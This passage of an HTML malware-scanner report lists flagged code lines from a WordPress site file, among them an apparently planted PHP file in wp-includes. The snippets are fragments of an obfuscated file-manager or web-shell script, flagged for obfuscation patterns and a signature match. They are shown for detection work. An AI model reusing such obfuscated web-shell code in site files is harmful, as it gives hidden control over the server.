</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 179</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">_0x54</span><span style="color: #007700">, </span><span style="color: #0000BB">_0x32</span><span style="color: #007700">, </span><span style="color: #0000BB">_0x1a</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'\\'</span><span style="color: #007700">, </span><span style="color: #DD0000">'/'</span><span style="color: #007700">, </span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #DD0000">'DOCUMENT_ROOT'</span><span style="color: #007700">]), </span><span style="color: #DD0000">'/'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">displayPathItem</span><span style="color: #007700">(</span><span style="color: #0000BB">$title</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">) {print </span><span style="color: #DD0000">"<div class='path-nav'><strong></span><span style="color: #007700">{</span><span style="color: #0000BB">$title</span><span style="color: #007700">}</span><span style="color: #DD0000">:</strong>" </span><span style="color: #007700">. </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #DD0000">"</div>"</span><span style="color: #007700">;}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 25</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">PathCl</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">Result</span><span style="color: #007700">(</span><span style="color: #0000BB">$Int</span><span style="color: #007700">) {</span><span style="color: #0000BB">$I</span><span style="color: #007700">=array(</span><span style="color: #DD0000">'C'</span><span style="color: #007700">,</span><span style="color: #DD0000">'P'</span><span style="color: #007700">,</span><span style="color: #DD0000">'Q'</span><span style="color: #007700">,</span><span style="color: #DD0000">'T'</span><span style="color: #007700">,</span><span style="color: #DD0000">'U'</span><span style="color: #007700">,</span><span style="color: #DD0000">'M'</span><span style="color: #007700">,</span><span style="color: #DD0000">'V'</span><span style="color: #007700">,</span><span style="color: #DD0000">'h'</span><span style="color: #007700">,</span><span style="color: #DD0000">'E'</span><span style="color: #007700">,</span><span style="color: #DD0000">'L'</span><span style="color: #007700">,</span><span style="color: #DD0000">'l'</span><span style="color: #007700">,</span><span style="color: #DD0000">'0'</span><span style="color: #007700">,</span><span style="color: #DD0000">'K'</span><span style="color: #007700">,</span><span style="color: #DD0000">'8'</span><span style="color: #007700">,</span><span style="color: #DD0000">'C'</span><span style="color: #007700">,</span><span style="color: #DD0000">'l'</span><span style="color: #007700">,</span><span style="color: #DD0000">'a'</span><span style="color: #007700">,</span><span style="color: #DD0000">'U'</span><span style="color: #007700">,</span><span style="color: #DD0000">'D'</span><span style="color: #007700">,</span><span style="color: #DD0000">'e'</span><span style="color: #007700">,</span><span style="color: #DD0000">'4'</span><span style="color: #007700">,</span><span style="color: #DD0000">'I'</span><span style="color: #007700">,</span><span style="color: #DD0000">'m'</span><span style="color: #007700">,</span><span style="color: #DD0000">'1'</span><span style="color: #007700">,</span><span style="color: #DD0000">'5'</span><span style="color: #007700">,</span><span style="color: #DD0000">'s'</span><span style="color: #007700">,</span><span style="color: #DD0000">'b'</span><span style="color: #007700">,</span><span style="color: #DD0000">'R'</span><span style="color: #007700">,</span><span style="color: #DD0000">'Y'</span><span style="color: #007700">,</span><span style="color: #DD0000">'O'</span><span style="color: #007700">,</span><span style="color: #DD0000">'u'</span><span style="color: #007700">,</span><span style="color: #DD0000">'W'</span><span style="color: #007700">,</span><span style="color: #DD0000">'X'</span><span style="color: #007700">,</span><span style="color: #DD0000">'Z'</span><span style="color: #007700">,</span><span style="color: #DD0000">'+'</span><span style="color: #007700">,</span><span style="color: #DD0000">'c'</span><span style="color: #007700">,</span><span style="color: #DD0000">'@'</span><span style="color: #007700">,</span><span style="color: #DD0000">'d'</span><span style="color: #007700">,</span><span style="color: #DD0000">'3'</span><span style="color: #007700">,</span><span style="color: #DD0000">'r'</span><span style="color: #007700">,</span><span style="color: #DD0000">'F'</span><span style="color: #007700">,</span><span style="color: #DD0000">')'</span><span style="color: #007700">,</span><span style="color: #DD0000">'B'</span><span style="color: #007700">,</span><span style="color: #DD0000">'y'</span><span style="color: #007700">,</span><span style="color: #DD0000">'C'</span><span style="color: #007700">,</span><span style="color: #DD0000">'J'</span><span style="color: #007700">,</span><span style="color: #DD0000">'q'</span><span style="color: #007700">,</span><span style="color: #DD0000">'G'</span><span style="color: #007700">,</span><span style="color: #DD0000">'#'</span><span style="color: #007700">,</span><span style="color: #DD0000">'S'</span><span style="color: #007700">,</span><span style="color: #DD0000">'o'</span><span style="color: #007700">,</span><span style="color: #DD0000">'H'</span><span style="color: #007700">,</span><span style="color: #DD0000">'4'</span><span style="color: #007700">,</span><span style="color: #DD0000">'A'</span><span style="color: #007700">,</span><span style="color: #DD0000">'i'</span><span style="color: #007700">,</span><span style="color: #DD0000">'j'</span><span style="color: #007700">,</span><span style="color: #DD0000">'t'</span><span style="color: #007700">,</span><span style="color: #DD0000">'v'</span><span style="color: #007700">,</span><span style="color: #DD0000">'w'</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 40</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">' / '</span><span style="color: #007700">, </span><span style="color: #0000BB">$breadcrumbs</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getPermissions</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 47</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"</span><span style="color: #0000BB">$readable</span><span style="color: #DD0000"> </span><span style="color: #0000BB">$writable</span><span style="color: #DD0000"> </span><span style="color: #0000BB">$executable</span><span style="color: #DD0000">"</span><span style="color: #007700">;}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 49</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">formatFileSize</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 50</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes </span><span style="color: #007700">/ </span><span style="color: #0000BB">1073741824</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">) . </span><span style="color: #DD0000">' GB'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 51</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes </span><span style="color: #007700">/ </span><span style="color: #0000BB">1048576</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">) . </span><span style="color: #DD0000">' MB'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 52</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes </span><span style="color: #007700">/ </span><span style="color: #0000BB">1024</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">) . </span><span style="color: #DD0000">' KB'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$bytes </span><span style="color: #007700">. </span><span style="color: #DD0000">' By'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">renderFileList</span><span style="color: #007700">(</span><span style="color: #0000BB">$GetPath</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 87</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">LoadFile</span><span style="color: #007700">(</span><span style="color: #0000BB">$GetPath</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ae7830db <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ae7830db)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Y2hy</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_28").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/js/page.template.1769473134.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 15.03 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 02:19:16</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 02:19:16</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 22</span><br><table id="file_29" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 108</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$__</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$_</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() { if (</span><span style="color: #0000BB">confirm</span><span style="color: #007700">(</span><span style="color: #DD0000">'Delete?'</span><span style="color: #007700">)) </span><span style="color: #0000BB">_0x02</span><span style="color: #007700">(</span><span style="color: #0000BB">_0x4b12</span><span style="color: #007700">(</span><span style="color: #0000BB">0x17</span><span style="color: #007700">), </span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">getAttribute</span><span style="color: #007700">(</span><span style="color: #DD0000">'data-path'</span><span style="color: #007700">)); }); }); </span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">querySelectorAll</span><span style="color: #007700">(</span><span style="color: #DD0000">'.rename-btn'</span><span style="color: #007700">).forEach(</span><span style="color: #0000BB">_0x9b </span><span style="color: #007700">=> { </span><span style="color: #0000BB">_0x9b</span><span style="color: #007700">[</span><span style="color: #0000BB">_0x4b12</span><span style="color: #007700">(</span><span style="color: #0000BB">0xf</span><span style="color: #007700">)](</span><span style="color: #0000BB">_0x4b12</span><span style="color: #007700">(</span><span style="color: #0000BB">0x11</span><span style="color: #007700">), function() { const </span><span style="color: #0000BB">_0xname </span><span style="color: #007700">= </span><span style="color: #0000BB">prompt</span><span style="color: #007700">(</span><span style="color: #DD0000">'New name:'</span><span style="color: #007700">, </span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">getAttribute</span><span style="color: #007700">(</span><span style="color: #DD0000">'data-</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 12</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_absolute_root</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$script_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">$pos</span><span style="color: #007700">);}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 172</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 175</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">_0x1b</span><span style="color: #007700">, </span><span style="color: #0000BB">_0x2c</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 176</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">_0x5f2e</span><span style="color: #007700">[</span><span style="color: #0000BB">_0x1b</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 179</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">_0x54</span><span style="color: #007700">, </span><span style="color: #0000BB">_0x32</span><span style="color: #007700">, </span><span style="color: #0000BB">_0x1a</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'\\'</span><span style="color: #007700">, </span><span style="color: #DD0000">'/'</span><span style="color: #007700">, </span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #DD0000">'DOCUMENT_ROOT'</span><span style="color: #007700">]), </span><span style="color: #DD0000">'/'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">displayPathItem</span><span style="color: #007700">(</span><span style="color: #0000BB">$title</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">) {print </span><span style="color: #DD0000">"<div class='path-nav'><strong></span><span style="color: #007700">{</span><span style="color: #0000BB">$title</span><span style="color: #007700">}</span><span style="color: #DD0000">:</strong>" </span><span style="color: #007700">. </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #DD0000">"</div>"</span><span style="color: #007700">;}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 25</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">PathCl</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">Result</span><span style="color: #007700">(</span><span style="color: #0000BB">$Int</span><span style="color: #007700">) {</span><span style="color: #0000BB">$I</span><span style="color: #007700">=array(</span><span style="color: #DD0000">'C'</span><span style="color: #007700">,</span><span style="color: #DD0000">'P'</span><span style="color: #007700">,</span><span style="color: #DD0000">'Q'</span><span style="color: #007700">,</span><span style="color: #DD0000">'T'</span><span style="color: #007700">,</span><span style="color: #DD0000">'U'</span><span style="color: #007700">,</span><span style="color: #DD0000">'M'</span><span style="color: #007700">,</span><span style="color: #DD0000">'V'</span><span style="color: #007700">,</span><span style="color: #DD0000">'h'</span><span style="color: #007700">,</span><span style="color: #DD0000">'E'</span><span style="color: #007700">,</span><span style="color: #DD0000">'L'</span><span style="color: #007700">,</span><span style="color: #DD0000">'l'</span><span style="color: #007700">,</span><span style="color: #DD0000">'0'</span><span style="color: #007700">,</span><span style="color: #DD0000">'K'</span><span style="color: #007700">,</span><span style="color: #DD0000">'8'</span><span style="color: #007700">,</span><span style="color: #DD0000">'C'</span><span style="color: #007700">,</span><span style="color: #DD0000">'l'</span><span style="color: #007700">,</span><span style="color: #DD0000">'a'</span><span style="color: #007700">,</span><span style="color: #DD0000">'U'</span><span style="color: #007700">,</span><span style="color: #DD0000">'D'</span><span style="color: #007700">,</span><span style="color: #DD0000">'e'</span><span style="color: #007700">,</span><span style="color: #DD0000">'4'</span><span style="color: #007700">,</span><span style="color: #DD0000">'I'</span><span style="color: #007700">,</span><span style="color: #DD0000">'m'</span><span style="color: #007700">,</span><span style="color: #DD0000">'1'</span><span style="color: #007700">,</span><span style="color: #DD0000">'5'</span><span style="color: #007700">,</span><span style="color: #DD0000">'s'</span><span style="color: #007700">,</span><span style="color: #DD0000">'b'</span><span style="color: #007700">,</span><span style="color: #DD0000">'R'</span><span style="color: #007700">,</span><span style="color: #DD0000">'Y'</span><span style="color: #007700">,</span><span style="color: #DD0000">'O'</span><span style="color: #007700">,</span><span style="color: #DD0000">'u'</span><span style="color: #007700">,</span><span style="color: #DD0000">'W'</span><span style="color: #007700">,</span><span style="color: #DD0000">'X'</span><span style="color: #007700">,</span><span style="color: #DD0000">'Z'</span><span style="color: #007700">,</span><span style="color: #DD0000">'+'</span><span style="color: #007700">,</span><span style="color: #DD0000">'c'</span><span style="color: #007700">,</span><span style="color: #DD0000">'@'</span><span style="color: #007700">,</span><span style="color: #DD0000">'d'</span><span style="color: #007700">,</span><span style="color: #DD0000">'3'</span><span style="color: #007700">,</span><span style="color: #DD0000">'r'</span><span style="color: #007700">,</span><span style="color: #DD0000">'F'</span><span style="color: #007700">,</span><span style="color: #DD0000">')'</span><span style="color: #007700">,</span><span style="color: #DD0000">'B'</span><span style="color: #007700">,</span><span style="color: #DD0000">'y'</span><span style="color: #007700">,</span><span style="color: #DD0000">'C'</span><span style="color: #007700">,</span><span style="color: #DD0000">'J'</span><span style="color: #007700">,</span><span style="color: #DD0000">'q'</span><span style="color: #007700">,</span><span style="color: #DD0000">'G'</span><span style="color: #007700">,</span><span style="color: #DD0000">'#'</span><span style="color: #007700">,</span><span style="color: #DD0000">'S'</span><span style="color: #007700">,</span><span style="color: #DD0000">'o'</span><span style="color: #007700">,</span><span style="color: #DD0000">'H'</span><span style="color: #007700">,</span><span style="color: #DD0000">'4'</span><span style="color: #007700">,</span><span style="color: #DD0000">'A'</span><span style="color: #007700">,</span><span style="color: #DD0000">'i'</span><span style="color: #007700">,</span><span style="color: #DD0000">'j'</span><span style="color: #007700">,</span><span style="color: #DD0000">'t'</span><span style="color: #007700">,</span><span style="color: #DD0000">'v'</span><span style="color: #007700">,</span><span style="color: #DD0000">'w'</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 40</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">' / '</span><span style="color: #007700">, </span><span style="color: #0000BB">$breadcrumbs</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getPermissions</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 47</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"</span><span style="color: #0000BB">$readable</span><span style="color: #DD0000"> </span><span style="color: #0000BB">$writable</span><span style="color: #DD0000"> </span><span style="color: #0000BB">$executable</span><span style="color: #DD0000">"</span><span style="color: #007700">;}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 49</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">formatFileSize</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 50</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes </span><span style="color: #007700">/ </span><span style="color: #0000BB">1073741824</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">) . </span><span style="color: #DD0000">' GB'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 51</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes </span><span style="color: #007700">/ </span><span style="color: #0000BB">1048576</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">) . </span><span style="color: #DD0000">' MB'</span><span style="color: #007700">; }</span>
</span>
